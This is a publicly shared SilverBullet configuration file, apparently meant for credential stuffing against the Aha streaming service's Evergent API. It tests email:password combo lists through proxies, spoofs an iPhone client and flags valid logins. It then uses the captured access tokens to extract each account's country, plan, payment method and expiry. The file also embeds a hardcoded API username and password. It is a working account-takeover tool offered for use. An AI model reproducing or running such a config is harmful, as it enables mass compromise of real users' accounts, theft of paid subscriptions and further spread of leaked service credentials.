AHA
Public
.SVB
YASHVIRGAMING
Dec 29, 2025
8
.SVB
Copy
Save
Share
QR
New
[SETTINGS] { "Name": "AHA", "SuggestedBots": 100, "MaxCPM": 0, "LastModified": "2025-09-02T22:45:26.7272635+04:00", "AdditionalInfo": "Use Combo India", "RequiredPlugins": [], "Author": "🔥 @therealyashvirgaming 🔥", "Version": "1.1.4 [SB]", "SaveEmptyCaptures": false, "ContinueOnCustom": false, "SaveHitsToTextFile": false, "IgnoreResponseErrors": false, "MaxRedirects": 8, "NeedsProxies": true, "OnlySocks": false, "OnlySsl": false, "MaxProxyUses": 0, "BanProxyAfterGoodStatus": false, "BanLoopEvasionOverride": -1, "EncodeData": false, "AllowedWordlist1": "Default", "AllowedWordlist2": "MailPass", "DataRules": [], "CustomInputs": [], "CaptchaUrl": "", "IsBase64": false, "FilterList": [], "EvaluateMathOCR": false, "SecurityProtocol": 0, "ForceHeadless": false, "AlwaysOpen": false, "AlwaysQuit": false, "QuitOnBanRetry": false, "AcceptInsecureCertificates": true, "DisableNotifications": false, "DisableImageLoading": false, "DefaultProfileDirectory": false, "CustomUserAgent": "", "RandomUA": false, "CustomCMDArgs": "", "Title": "AHA", "IconPath": "Icon\\svbfile.ico", "LicenseSource": null, "Message": null, "MessageColor": "#FFFFFFFF", "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]", "AuthorColor": "#FFFFB266", "WordlistColor": "#FFB5C2E1", "BotsColor": "#FFA8FFFF", "CustomInputColor": "#FFD6C7C7", "CPMColor": "#FFFFFFFF", "ProgressColor": "#FFAD93E3", "HitsColor": "#FF66FF66", "CustomColor": "#FFFFB266", "ToCheckColor": "#FF7FFFD4", "FailsColor": "#FFFF3333", "RetriesColor": "#FFFFFF99", "OcrRateColor": "#FF4698FD", "ProxiesColor": "#FFFFFFFF" } [SCRIPT] REQUEST POST "https://rest-prod-aha.evergent.com/aha/searchAccountV2" CONTENT "{\"SearchAccountV2RequestMessage\":{\"channelPartnerID\":\"ARHAMEDIA\",\"apiPassword\":\"Aha@p!u$#r123#$\",\"apiUser\":\"ahaapiuser\",\"email\":\"<USER>\"}}" CONTENTTYPE "application/json" HEADER "Host: rest-prod-aha.evergent.com" HEADER "Content-Type: application/json" HEADER "Accept: application/json, text/plain, */*" HEADER "Accept-Language: en-GB,en;q=0.9" HEADER "Accept-Encoding: gzip, deflate, br" HEADER "Content-Length: 155" HEADER "User-Agent: aha/74 CFNetwork/3826.600.41 Darwin/24.6.0" HEADER "Connection: keep-alive" KEYCHECK KEYCHAIN Success OR KEY "\"message\":\"SUCCESS" KEY "\"responseCode\":\"1" KEY "\"status\":\"Active\"" KEYCHAIN Failure OR KEY "<SOURCE>" DoesNotContain "SUCCESS" #LOGIN REQUEST POST "https://rest-prod-aha.evergent.com/aha/getOAuthAccessTokenv2" CONTENT "{\"GetOAuthAccessTokenv2RequestMessage\":{\"channelPartnerID\":\"ARHAMEDIA\",\"apiUser\":\"ahaapiuser\",\"apiPassword\":\"Aha@p!u$#r123#$\",\"contactPassword\":\"<PASS>\",\"contactUserName\":\"<USER>\",\"deviceMessage\":{\"os\":\"ios\",\"deviceName\":\"iPhone\",\"deviceType\":\"iosmobile\",\"serialNo\":\"536B2358-64A9-497F-8A76-885B9472575F\",\"modelNo\":\"iPhone 15 Pro Max\",\"appType\":\"iOS\",\"appClientId\":\"\",\"osVersion\":-1}}}" CONTENTTYPE "application/json" HEADER "Host: rest-prod-aha.evergent.com" HEADER "Content-Type: application/json" HEADER "Accept: application/json, text/plain, */*" HEADER "Accept-Language: en-GB,en;q=0.9" HEADER "Accept-Encoding: gzip, deflate, br" HEADER "Content-Length: 401" HEADER "User-Agent: aha/74 CFNetwork/3826.600.41 Darwin/24.6.0" KEYCHECK KEYCHAIN Failure OR KEY "Wrong Username or Password" KEY "errorCode\":\"eV2134" KEY "\"responseCode\":\"0" KEYCHAIN Success OR KEY "\"accessToken\":\"" KEY "User Logged in successfully." KEYCHAIN Custom "CUSTOM" OR KEY "Login limit reached" #cpCustomerID PARSE "<SOURCE>" JSON "cpCustomerID" -> VAR "cpCustomerID" #channelPartnerID PARSE "<SOURCE>" JSON "channelPartnerID" -> VAR "channelPartnerID" #TK PARSE "<SOURCE>" LR "\"accessToken\":\"" "\"" -> VAR "TK" #RTK PARSE "<SOURCE>" LR "\"refreshToken\":\"" "\"" -> VAR "RTK" #CONTACT REQUEST POST "https://rest-prod-aha.evergent.com/aha/getContact" CONTENT "{\"GetContactRequestMessage\":{\"channelPartnerID\":\"<channelPartnerID>\",\"apiPassword\":\"Aha@p!u$#r123#$\",\"apiUser\":\"ahaapiuser\"}}" CONTENTTYPE "application/json" HEADER "Host: rest-prod-aha.evergent.com" HEADER "Content-Type: application/json" HEADER "Accept: application/json, text/plain, */*" HEADER "Authorization: Bearer <TK>" HEADER "Accept-Encoding: gzip, deflate, br" HEADER "Accept-Language: en-GB,en;q=0.9" HEADER "Content-Length: 113" HEADER "User-Agent: aha/74 CFNetwork/3826.600.41 Darwin/24.6.0" #contactID PARSE "<SOURCE>" JSON "contactID" -> VAR "contactID" PARSE "<SOURCE>" LR "\"billingAddress\":{\"country\":\"" "\"}" CreateEmpty=FALSE -> CAP "Country" #SUBCRIPTIONS REQUEST POST "https://rest-prod-aha.evergent.com/aha/getEntitlements" CONTENT "{\"GetEntitlementsRequestMessage\":{\"channelPartnerID\":\"<channelPartnerID>\",\"apiPassword\":\"Aha@p!u$#r123#$\",\"apiUser\":\"ahaapiuser\",\"returnUpgradableFlag\":true,\"isNotifyNonRenewableExpPrompt\":true,\"returnProductAttributes\":true,\"contactID\":\"<contactID>\"}}" CONTENTTYPE "application/json" HEADER "Host: rest-prod-aha.evergent.com" HEADER "Content-Type: application/json" HEADER "Accept: application/json, text/plain, */*" HEADER "Authorization: Bearer <TK>" HEADER "Accept-Encoding: gzip, deflate, br" HEADER "Accept-Language: en-GB,en;q=0.9" HEADER "Content-Length: 120" HEADER "User-Agent: aha/74 CFNetwork/3826.600.41 Darwin/24.6.0" #Plan PARSE "<SOURCE>" LR "\"serviceID\":\"" "\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Plan" #Plan_Type PARSE "<SOURCE>" LR "\"serviceName\":\"" "\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Plan Type" #Plan_Status PARSE "<SOURCE>" LR "\"status\":\"" "\"" CreateEmpty=FALSE -> CAP "Plan Status" #paymentMethod PARSE "<SOURCE>" JSON "paymentMethod" CreateEmpty=FALSE -> CAP "paymentMethod" #Expiry PARSE "<SOURCE>" LR "\"validityEndDate\":\"" " " CreateEmpty=FALSE -> CAP "Expiry" #Remaining_Days FUNCTION GetRemainingDay "<Expiry>" -> CAP "Remaining Days" #AUTHOR FUNCTION Constant "🔥 @therealyashvirgaming 🔥" -> CAP "Config By "
Scan to View
Use your phone's camera or a QR scanner app to open this paste instantly.